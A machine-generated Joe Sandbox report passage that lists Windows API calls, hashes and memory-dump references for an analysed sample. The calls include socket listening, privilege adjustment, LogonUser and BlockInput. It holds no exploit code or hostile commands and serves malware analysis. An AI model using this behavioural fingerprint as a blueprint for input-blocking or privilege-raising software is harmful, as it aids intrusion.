                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                          • String ID: $@$SeShutdownPrivilege
                                                          • API String ID: 2234035333-194228
                                                          • Opcode ID: 66b9d5b19acdb7c684a7ba392f2800f5a90608bf3f23363995b399f639d14faf
                                                          • Instruction ID: 29f4c93ea4cfc2b3935044868e8d9303b0d5727cc26a479916d8777a837da66b
                                                          • Opcode Fuzzy Hash: 66b9d5b19acdb7c684a7ba392f2800f5a90608bf3f23363995b399f639d14faf
                                                          • Instruction Fuzzy Hash: 2F01D431770722EAF72866A49C8AFFAB25CAB047C0F200065F917DE0D2DE905C209560
                                                          APIs
                                                          • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 002C69C7
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C69D6
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 002C69F2
                                                          • listen.WSOCK32(00000000,00000005), ref: 002C6A01
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C6A1B
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 002C6A2F
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketlistensocket
                                                          • String ID:
                                                          • API String ID: 1279440585-0
                                                          • Opcode ID: 32e49ac3837a0f17eae4ed37ae987504144cb7d5b9f3fb16477611d20a7a7d3b
                                                          • Instruction ID: de745d2218f3b7f12df5841586110af70c0702af11f742ec7f033adc66fbc266
                                                          • Opcode Fuzzy Hash: 32e49ac3837a0f17eae4ed37ae987504144cb7d5b9f3fb16477611d20a7a7d3b
                                                          • Instruction Fuzzy Hash: 1B21BD302102019FCB10EF64DC89F6EB7B9EF48724F148258E81AAB291CB70AC51CF90
                                                          APIs
                                                            • Part of subcall function 002529E2: GetWindowLongW.USER32(?,000000EB), ref: 002529F3
                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00251DD6
                                                          • GetSysColor.USER32(0000000F), ref: 00251E2A
                                                          • SetBkColor.GDI32(?,00000000), ref: 00251E3D
                                                            • Part of subcall function 0025166C: DefDlgProcW.USER32(?,00000020,?), ref: 002516B4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ColorProc$LongWindow
                                                          • String ID:
                                                          • API String ID: 3744519093-0
                                                          • Opcode ID: 70f473f30a3c576c981ba81a0f9b5991dc9d0fe737b4b75df6dfc63fcf1bf689
                                                          • Instruction ID: 21c61d2275a26988c9b528dafd8fec3b2fceec70b3ac0c303bfd2125402fe3b4
                                                          • Opcode Fuzzy Hash: 70f473f30a3c576c981ba81a0f9b5991dc9d0fe737b4b75df6dfc63fcf1bf689
                                                          • Instruction Fuzzy Hash: D2A12578137406BEDA296E698C49FBB356DDB46303F24420AFC02D61D1CA709D36C67D
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 002BC329
                                                          • _wcscmp.LIBCMT ref: 002BC359
                                                          • _wcscmp.LIBCMT ref: 002BC36E
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 002BC37F
                                                          • FindClose.KERNEL32(00000000,00000001,00000000), ref: 002BC3AF
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstNext
                                                          • String ID:
                                                          • API String ID: 2387731787-0
                                                          • Opcode ID: 717ba87892d30ffe31ad6fd7505c2bacd9b7bb0874713ffd22633baa93f36f1e
                                                          • Instruction ID: 142b557a151f96ff76369e80adeb4ccaea3a4d517171ccc0001c1a410bef5267
                                                          • Opcode Fuzzy Hash: 717ba87892d30ffe31ad6fd7505c2bacd9b7bb0874713ffd22633baa93f36f1e
                                                          • Instruction Fuzzy Hash: 9551BC356206028FC714DF68D4D0EAAB3E4EF49324F20825DE95ACB3A1CB70AD64CF91
                                                          APIs
                                                            • Part of subcall function 002C8475: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 002C84A0
                                                          • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 002C6E89
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C6EB2
                                                          • bind.WSOCK32(00000000,?,00000010), ref: 002C6EEB
                                                          • WSAGetLastError.WSOCK32(00000000), ref: 002C6EF8
                                                          • closesocket.WSOCK32(00000000,00000000), ref: 002C6F0C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorLast$bindclosesocketinet_addrsocket
                                                          • String ID:
                                                          • API String ID: 99427753-0
                                                          • Opcode ID: a7c1cc7b99d49796d800da26cd36dce859ec833700852355a457e5745ad933fe
                                                          • Instruction ID: 0b4e9583cf2e0311875d801a9c243839738fa4b4185cd5654479f8d0a38c63fc
                                                          • Opcode Fuzzy Hash: a7c1cc7b99d49796d800da26cd36dce859ec833700852355a457e5745ad933fe
                                                          • Instruction Fuzzy Hash: 2341D275660210AFDB10BF649C8AF6EB3A89F08718F04855CFD06AB3C2DA709D558F95
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                                          • String ID:
                                                          • API String ID: 292994002-0
                                                          • Opcode ID: b74c4fb60fd95c9f158f9d6bbc9fe18f6f74bd2649cd3ba3c98c685c681bfccf
                                                          • Instruction ID: 7bce0a1f5603011d0a21f35b4aa48fcaa32a348b245474574cfe59959cb4828f
                                                          • Opcode Fuzzy Hash: b74c4fb60fd95c9f158f9d6bbc9fe18f6f74bd2649cd3ba3c98c685c681bfccf
                                                          • Instruction Fuzzy Hash: 1011E6313609329BE7111F669CC8B6EB7A8FF44721B00452AE805D7341CBB0AD528ED4
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LocalTime__swprintf
                                                          • String ID: %.3d$WIN_XPe
                                                          • API String ID: 2070861257-2409531811
                                                          • Opcode ID: 0b842083a1c7dfe146e33ad6e807b01bedfecc5d670347de53d62c97bb053095
                                                          • Instruction ID: 36dd8ca35ec822de712931bb7c2053c2287472c5357b956ffd8424ccea2b123d
                                                          • Opcode Fuzzy Hash: 0b842083a1c7dfe146e33ad6e807b01bedfecc5d670347de53d62c97bb053095
                                                          • Instruction Fuzzy Hash: 47D01271C7410DEECF049A91D8D8DFDB77CEB04304F104052F906A2040D2B587A8AA26
                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,002C1ED6,00000000), ref: 002C2AAD
                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 002C2AE4
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                          • String ID:
                                                          • API String ID: 599397726-0
                                                          • Opcode ID: b3d328b70e0bd2e316ac6f30a2260f06eb003859c20315312f7719ecb476d539
                                                          • Instruction ID: db3e014173260964e5955640a5b480a10e81f1be986d069f749b865b866cca6a
                                                          • Opcode Fuzzy Hash: b3d328b70e0bd2e316ac6f30a2260f06eb003859c20315312f7719ecb476d539
                                                          • Instruction Fuzzy Hash: 0741D37162060AFFEB20DE54CC85FBBB7BCEB40754F10411EF605A6141EEB1AE699A60
                                                          APIs
                                                            • Part of subcall function 00270FE6: std::exception::exception.LIBCMT ref: 0027101C
                                                            • Part of subcall function 00270FE6: __CxxThrowException@8.LIBCMT ref: 00271031
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 002A93E3
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 002A9410
                                                          • GetLastError.KERNEL32 ref: 002A941D
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1922334811-0
                                                          • Opcode ID: 4a9e7c028932bed76e1404607023489f43a83cdf372310d515f47e5a90796030
                                                          • Instruction ID: 0aa213b7b61558a985fd0c80ac4f67a028d521c2cc7236c7b0119d620d6655a3
                                                          • Opcode Fuzzy Hash: 4a9e7c028932bed76e1404607023489f43a83cdf372310d515f47e5a90796030
                                                          • Instruction Fuzzy Hash: 781191B1428205AFD728DF55ECC9D2BB7BCEB48710B20856EF45997640EB74AC91CB60
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002B4271
                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 002B42B2
                                                          • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 002B42BD
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                          • String ID:
                                                          • API String ID: 33631002-0
                                                          • Opcode ID: 0d848da39fb38e31e26647640f9d059b2477607498eab87511c62d43103b1a71
                                                          • Instruction ID: 469f5b899592f02f16fd8bc4e6fd3e9a722b157f6c5d0831d6b7928846fe0d97
                                                          • Opcode Fuzzy Hash: 0d848da39fb38e31e26647640f9d059b2477607498eab87511c62d43103b1a71
                                                          • Instruction Fuzzy Hash: 5D118271E01228BFDB108F95AC88BFFBBBCEB45B60F104155FD04EB280C6705A019BA1
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 002B4F45
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 002B4F5C
                                                          • FreeSid.ADVAPI32(?), ref: 002B4F6C
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          • Opcode ID: c2f62a72fa8df024ff249e6defcf60d0215fdc71d4943b4121454a626eec0896
                                                          • Instruction ID: c71f0043831f2fe3156fae098d4ba25dfa5b181435e4964c60646b3563b440c7
                                                          • Opcode Fuzzy Hash: c2f62a72fa8df024ff249e6defcf60d0215fdc71d4943b4121454a626eec0896
                                                          • Instruction Fuzzy Hash: 6FF03775A5120DBFDB00DFE0ECC9AAEBBB8EB08211F0044A9A901E6581E6746A448B50
                                                          APIs
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 002B1B01
                                                          • keybd_event.USER32(?,7707C0D0,?,00000000), ref: 002B1B14
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: InputSendkeybd_event
                                                          • String ID:
                                                          • API String ID: 3536248340-0
                                                          • Opcode ID: 1321f59f002424c50b7de5eb13f5a49d4b1d314a1116f9e32462ce72cbe4586f
                                                          • Instruction ID: 581bed92328879c7822c71b2987863f891507ae83885723ff46850723a86b528
                                                          • Opcode Fuzzy Hash: 1321f59f002424c50b7de5eb13f5a49d4b1d314a1116f9e32462ce72cbe4586f
                                                          • Instruction Fuzzy Hash: 2AF0A93191024DABDB00CF90C849BFE7BB4FF04305F40800AF9459A292D3799622DF94
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,002C9B52,?,002E098C,?), ref: 002BA6DA
                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,002C9B52,?,002E098C,?), ref: 002BA6EC
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          • Opcode ID: d467a33353d51146f75c064339bdca9bfc83b7de19e5440b59475f7b2cb956ab
                                                          • Instruction ID: d260bf3601996672885eaf61df44adfc5d2ad9a3c21bd6d4fe99472f52875eef
                                                          • Opcode Fuzzy Hash: d467a33353d51146f75c064339bdca9bfc83b7de19e5440b59475f7b2cb956ab
                                                          • Instruction Fuzzy Hash: B5F02E3541421DBBDB20AFA4CC8CFDA376CFF08351F004155B908D6180D6709950CFE1
                                                          APIs
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,002A8F27), ref: 002A8DFE
                                                          • CloseHandle.KERNEL32(?,?,002A8F27), ref: 002A8E10
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                          • String ID:
                                                          • API String ID: 81990902-0
                                                          • Opcode ID: 418631cd8bffe61b3d123aa2a964b318e604a76a473536f5eb49edb09635c211
                                                          • Instruction ID: d455b098fdeae3b67bf111b3f10012b4a5f9021bdac71e8aff8e47c65c4eacae
                                                          • Opcode Fuzzy Hash: 418631cd8bffe61b3d123aa2a964b318e604a76a473536f5eb49edb09635c211
                                                          • Instruction Fuzzy Hash: 8AE04632020650EFE7222B64FC48E777BADEF00310B108829F89A84470CB72ACE0DB20
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,00278F87,?,?,?,00000001), ref: 0027A38A
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0027A393
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 4ca98c2eacce197cf9dc423d6918789b1b84e2af18abd858ca7dacd8daa8b9ff
                                                          • Instruction ID: 4dd0cb0b17b82b7517cd47c4b3700da4cb3405084435bde55033c93d6a4dbad9
                                                          • Opcode Fuzzy Hash: 4ca98c2eacce197cf9dc423d6918789b1b84e2af18abd858ca7dacd8daa8b9ff
                                                          • Instruction Fuzzy Hash: 4EB092314A4248ABCA402B91FC8DB883F68EB44A62F804090FA0D48464CBA254928A91
                                                          APIs
                                                          • BlockInput.USER32(00000001), ref: 002C45F0
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: BlockInput
                                                          • String ID:
                                                          • API String ID: 3456056419-0
                                                          • Opcode ID: 0ea6ab28e3eeba619dd24664d611ff3ac0d6c884435ef5b5f72184a0d061d85c
                                                          • Instruction ID: fde2e213e9962451cd486e00a797a2be563c7c5a92039fc82378e8fe2c98bfa2
                                                          • Opcode Fuzzy Hash: 0ea6ab28e3eeba619dd24664d611ff3ac0d6c884435ef5b5f72184a0d061d85c
                                                          • Instruction Fuzzy Hash: 21E09A312202159FD300BF5AE844E9BF7E8AFA87A0B00801AFC09CB350DAB0E9518B90
                                                          APIs
                                                          • mouse_event.USER32(00000002,00000000,00000000,00000000,00000000), ref: 002B5205
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: mouse_event
                                                          • String ID:
                                                          • API String ID: 2434400541-0
                                                          • Opcode ID: 9d4a97fa2a669074d99087474e52657d43c1459a3f43b572ad4cdd0cb681c304
                                                          • Instruction ID: 6c96951dd6626ecf1a71992b0caf6904f158a9df885d3b92b35ba7729d9b3865
                                                          • Opcode Fuzzy Hash: 9d4a97fa2a669074d99087474e52657d43c1459a3f43b572ad4cdd0cb681c304
                                                          • Instruction Fuzzy Hash: 8ED092A51B0F6A79FD580B2C9E1FFFA1608F3017C1FD48649714A8D0C2ECD568A6A831
                                                          APIs
                                                          • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,002A8FA7), ref: 002A9389
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.00000000002E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547070894.0000000000306000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547879223.0000000000310000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 0000000B.00000002.2547906303.0000000000319000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_11_2_250000_Organizational.jbxd
                                                          Similarity
                                                          • API ID: LogonUser
                                                          • String ID:
                                                          • API String ID: 1244722697-0
                                                          • Opcode ID: b3527bf9762bb68d71450048f3b97023a165acf72d3d78566dbe3d3f29998ac0
                                                          • Instruction ID: 714644fdec9f35a47f79379450562d4bedb9217b6c8ac7f8f3de09a71b7f8a07
                                                          • Opcode Fuzzy Hash: b3527bf9762bb68d71450048f3b97023a165acf72d3d78566dbe3d3f29998ac0
                                                          • Instruction Fuzzy Hash: 48D05E322A050EABEF018EA4EC45EAE3B69EB04B01F408111FE15C50A0C775D835AB60
                                                          APIs
                                                          • GetUserNameW.ADVAPI32(?,?), ref: 00290734
                                                          Memory Dump Source
                                                          • Source File: 0000000B.00000002.2546966618.0000000000251000.00000020.00000001.01000000.00000006.sdmp, Offset: 00250000, based on PE: true
                                                          • Associated: 0000000B.00000002.2546917480.0000000000250000.00000002.00000001.01000000.00000006.sdmpDownload File
